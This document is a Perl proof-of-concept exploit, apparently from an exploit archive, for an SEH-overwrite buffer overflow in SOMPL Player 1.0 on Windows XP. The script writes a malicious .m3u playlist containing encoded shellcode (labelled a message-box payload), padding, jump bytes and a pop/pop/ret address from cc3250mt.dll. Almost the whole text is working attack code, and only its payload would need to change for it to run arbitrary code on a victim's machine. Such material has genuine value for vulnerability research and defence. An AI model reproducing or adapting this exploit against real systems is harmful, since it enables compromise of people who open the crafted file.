# Exploit Title : SOMPL Player Buffer Overflow # Date : 20 January 2010 # Author : Rick2600 (ricks2600[at]gmail{dot}com) # Bug found by : Rick2600 (ricks2600[at]gmail{dot}com) # Software Link : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html # Version : 1.0 # Issue fixed in: ??? # OS : Windows # Tested on : XP SP2 and SP3 En # Type of vuln : Buffer Overflow # Ref : http://seclists.org/bugtraq/2010/Jan/160 # Greetz to : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r # # # Script provided 'as is', without any warranty. # Use for educational purposes only. # # # Code :
print "|------------------------------------------------------------------|\n"; print "| __ __ |\n"; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n"; print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n"; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n"; print "| |\n"; print "| http://www.corelan.be:8800 |\n"; print "| |\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n"; print "[+] SOMPL Player Buffer Overflow - SEH Overwrite\n";
$header = "#EXTM3U\n#EXTINF:";
#Shellcode: x86/alpha_mixed( MsgBox ) $shellcode = "\x89\xe7\xdb\xcf\xd9\x77\xf4\x59\x49\x49\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" . "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" . "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" . "\x75\x4a\x49\x48\x6b\x44\x62\x50\x56\x46\x51\x4b\x70\x42" . "\x44\x4c\x4b\x43\x70\x46\x50\x4b\x35\x4b\x70\x51\x68\x44" . "\x4c\x4e\x6b\x47\x30\x44\x4c\x4c\x4b\x50\x70\x47\x6c\x4c" . "\x6d\x4c\x4b\x43\x70\x46\x68\x4a\x4b\x46\x69\x4c\x4b\x43" . "\x70\x44\x74\x4e\x6d\x43\x70\x51\x6c\x4c\x4b\x47\x30\x45" . "\x6c\x43\x6e\x4f\x33\x48\x6b\x45\x39\x45\x30\x4c\x4b\x42" . "\x4c\x51\x34\x51\x34\x4e\x6b\x43\x75\x47\x4c\x4e\x6b\x51" . "\x44\x47\x75\x43\x48\x46\x61\x49\x7a\x4e\x6b\x50\x4a\x47" . "\x68\x4e\x6b\x42\x7a\x51\x30\x43\x31\x4a\x4b\x4a\x43\x50" . "\x34\x47\x39\x4c\x4b\x44\x74\x4c\x4b\x43\x31\x48\x6e\x50" . "\x31\x4b\x4f\x45\x61\x49\x50\x4b\x4c\x4c\x6c\x4d\x54\x49" . "\x50\x44\x34\x43\x37\x4a\x61\x48\x4f\x46\x6d\x46\x61\x48" . "\x47\x48\x6b\x4b\x44\x45\x6b\x43\x4c\x44\x64\x46\x48\x50" . "\x75\x4d\x31\x4c\x4b\x43\x6a\x51\x34\x47\x71\x48\x6b\x50" . "\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x46" . "\x61\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x68\x4d" . "\x59\x47\x34\x46\x44\x45\x4c\x50\x61\x4f\x33\x4e\x4d\x42" . "\x70\x46\x32\x48\x68\x4f\x5a\x4b\x4f\x4b\x4f\x49\x6f\x4e" . "\x69\x43\x37\x51\x54\x51\x54\x47\x34\x43\x74\x43\x74\x47" . "\x34\x43\x74\x42\x64\x47\x37\x47\x37\x50\x47\x42\x67\x50" . "\x39\x48\x4e\x51\x65\x4b\x56\x4a\x63\x42\x6c\x50\x4c\x42" . "\x6c\x42\x6c\x4d\x59\x4b\x55\x4b\x58\x45\x38\x4b\x4f\x49" . "\x6f\x49\x6f\x4c\x49\x4b\x72\x48\x6b\x45\x4c\x51\x4e\x4c" . "\x4d\x51\x6d\x45\x54\x4e\x69\x4c\x31\x4b\x30\x49\x51\x46" . "\x6c\x48\x68\x4f\x38\x49\x6f\x49\x6f\x4b\x4f\x48\x6b\x47" . "\x65\x45\x61\x49\x42\x51\x49\x4c\x48\x42\x71\x42\x34\x43" . "\x61\x42\x72\x4b\x4f\x50\x54\x44\x64\x44\x4c\x4a\x48\x4b" . "\x6f\x4b\x4f\x4b\x4f\x4b\x4f\x51\x47\x51\x6f\x51\x39\x42" . "\x42\x48\x68\x48\x66\x4b\x4f\x49\x6f\x49\x6f\x47\x33\x42" . "\x4f\x43\x42\x51\x75\x42\x4c\x50\x61\x42\x4e\x51\x30\x50" . "\x54\x51\x75\x43\x51\x50\x6d\x51\x30\x44\x6d\x47\x50\x42" . "\x70\x42\x77\x50\x4e\x50\x45\x42\x64\x42\x78\x41\x41";
$filename = "somplPOC.m3u"; print "[+] Check: $filename\n\n";
$buffer = "\x90" x 5; $buffer .= $shellcode; $buffer .= "B" x (4138 - length($shellcode)); $buffer .= "\xE9\xCD\xEF\xFF\xFF"; $buffer .= "\xEB\xF9\x90\x90"; $buffer .= pack("V", 0x32501B07); # pop/pop/ret Universal from cc3250mt.dll
open (FILE, ">$filename"); print FILE $buffer; close(FILE);
|